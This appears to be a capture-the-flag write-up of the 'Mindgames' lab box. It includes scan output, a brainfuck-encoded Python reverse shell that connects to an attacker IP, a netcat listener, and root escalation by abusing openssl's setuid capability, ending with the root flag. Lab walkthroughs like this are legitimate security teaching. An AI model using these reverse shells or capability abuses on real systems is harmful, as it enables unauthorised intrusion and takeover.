1. Scanning & Enumeration
We do the below scans in parallel.
1.1. Port Scanning
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 24:4f:06:26:0e:d3:7c:b8:18:42:40:12:7a:9e:3b:71 (RSA)
| 256 5c:2b:3c:56:fd:60:2f:f7:28:34:47:55:d6:f8:8d:c1 (ECDSA)
|_ 256 da:16:8b:14:aa:58:0e:e1:74:85:6f:af:bf:6b:8d:58 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mindgames.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nothing too special here.
1.2. Web Enumeration
I tried enumerating other directories in the website, but I did not find anything.
1.3. Web Exploration
This looks like the brainfuck language. Using a decoder here. Decoding the first one, we get the resultant: print("Hello, World")
The second one is:
def F(n):
if n <= 1:
return 1
return F(n-1)+F(n-2)
for i in range(10):
print(F(i))
both look python3. So … could we put a python3 reverse shell?
2. Foothold
I tried putting a vanilla python3 line, but it did not work. So, I tried encoding it first with brainfuck using this tool.
encoding
it works!
Get a reverse shell. I used the one below.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.8.184",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
Listening on a port.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.17.8.184] from (UNKNOWN) [10.10.28.151] 37062
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
mindgames@mindgames:~/webserver$
We are in!
3. PrivEsc
Upgrade the shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
I took some time enumerating and I found the below using linpeas.sh.
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep is writable
The /usr/bin/openssl = cap_setuid+ep looks very interesting. Look at my blog here to figure how to use it. Running,
mindgames@mindgames:~/webserver$ openssl req -engine ./openssl-engine.so
openssl req -engine ./openssl-engine.so
root@mindgames:~/webserver# id
id
uid=0(root) gid=1001(mindgames) groups=1001(mindgames)
root@mindgames:~/webserver# cd /root
cd /root
root@mindgames:/root# cat roo
cat root.txt
thm{yee_haww}
root@mindgames:/root#
And we are done!